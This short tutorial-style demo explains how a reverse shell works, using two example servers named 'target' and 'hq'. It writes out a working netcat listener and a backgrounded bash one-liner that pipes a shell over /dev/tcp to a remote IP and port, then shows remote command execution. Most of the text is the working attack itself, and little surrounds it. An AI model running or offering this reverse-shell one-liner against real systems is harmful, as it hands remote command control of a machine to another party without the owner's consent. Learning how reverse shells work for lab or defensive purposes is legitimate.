A reverse shell is achieved when you "send" a server's shell (in my demo the server is named target
) to another server (hq
in my setup).
Using this technique you can run root
commands on a server you aren't connected.
# open up a tcp port on the "hq" server to "receive" the reverse shell
$ nc -n -l -p 60001
# send the shell from the "target" server to "hq" socket
$ nohup /bin/bash >& /dev/tcp/10.20.30.40/60001 0<&1 2>&1 &
# now on "hq" you can run any command
hostname # command sent to execution on remote host
target # output received from command